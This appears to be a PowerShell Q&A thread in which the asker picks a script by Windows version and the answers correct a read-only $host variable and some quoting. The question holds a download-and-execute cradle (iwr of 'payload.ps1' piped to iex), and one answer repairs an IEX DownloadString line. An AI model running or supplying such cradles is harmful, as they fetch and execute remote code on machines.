# Trying to use Get-WmiObject to decide what script to call

Tags: powershell, if-statement, version, statements, elixir-iex

```
(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
```

Get Wmi Object Win32 Operating System Default Network Credentials

```
$host = ((Get-WmiObject Win32_OperatingSystem).Caption)
    if ($host -eq 'Microsoft Windows 7'){

    Write-Host "[+] Downloading windows 7 script"

        $URL = http://example.com
        IEX (New-Object Net.WebClient).DownloadString('$URL')}

elseif ($host -eq 'Microsoft Windows 8'){

        Write-Host "[+] Downloading windows 8 script"
```

etc...

Comment: To debug the issue please provide the output for `$host` and `$host -eq 'Microsoft Windows 7'`. Also there is no else statement in your sample code.

Answer (score 0):

This happens as `$host` is an [automatic variable](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_automatic_variables?view=powershell-6). The assignment fails on my system:

```
$host = ((Get-WmiObject Win32_OperatingSystem).Caption)
Cannot overwrite variable Host because it is read-only or constant.
At line:1 char:1
+ $host = ((Get-WmiObject Win32_OperatingSystem).Caption)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : WriteError: (Host:String) [], SessionStateUnauthorizedAccessException
    + FullyQualifiedErrorId : VariableNotWritable
```

Try using another a variable name, such as `$myHost`.

Answer (score 0):

From the provided code, in IEX command, add the double quotations to surround because Invoke-Expression's Command parameter accept string, and add the single quotations to surround $URL.

```
    $URL = "http://example.com"
    IEX "(New-Object Net.WebClient).DownloadString('$URL')"
```

In Addition, Invoke-Expression shouldn't be necssary to run Net.WebClient, you may simplify as below.

```
     $URL = "http://example.com"
    (New-Object Net.WebClient).DownloadString($URL)
```